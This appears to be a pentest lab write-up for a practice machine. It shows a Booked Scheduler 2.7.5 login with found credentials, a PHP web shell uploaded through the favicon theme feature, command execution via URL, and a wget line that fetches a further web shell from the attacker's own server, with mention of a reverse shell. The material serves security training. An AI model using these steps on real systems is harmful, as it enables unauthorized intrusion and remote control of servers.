3 :8003

http://192.168.175.64:8003/
Index of /
[ICO]	Name	Last modified	Size	Description
[DIR]	booked/	2019-02-05 21:02 	- 	 

http://192.168.175.64:8003/booked/Web/?
Login Page for booked
# from smb files, we can try creds

admin:adminadmin worked >
http://192.168.175.64:8003/booked/Web/dashboard.php
Booked Scheduler v2.7.5

Using https://github.com/F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF

http://192.168.175.64:8003/booked/Web/admin/
# shows directory listing

http://192.168.175.64:8003/booked/Web/admin/manage_theme.php
# updating the favicon.ico to kashz.php
# file is uploaded as custom-favicon.php

http://192.168.175.64:8003/booked/Web/custom-favicon.php?kcmd=whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
zino
Linux zino 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux

# stable shell
# tried bash reverse shell, trying to download web shell now
# port 80 not working; using 445

http://192.168.175.64:8003/booked/Web/custom-favicon.php?kcmd=wget%20http://192.168.49.175:445/web.php

$ python3 -m http.server 445
Serving HTTP on 0.0.0.0 port 445 (http://0.0.0.0:445/) ...
192.168.175.64 - - [23/Aug/2021 12:05:17] "GET / HTTP/1.1" 200 -
192.168.175.64 - - [23/Aug/2021 12:05:35] "GET /web.php HTTP/1.1" 200 -

http://192.168.175.64:8003/booked/Web/web.php
# got web shell
# can get reverse shell on 445 now.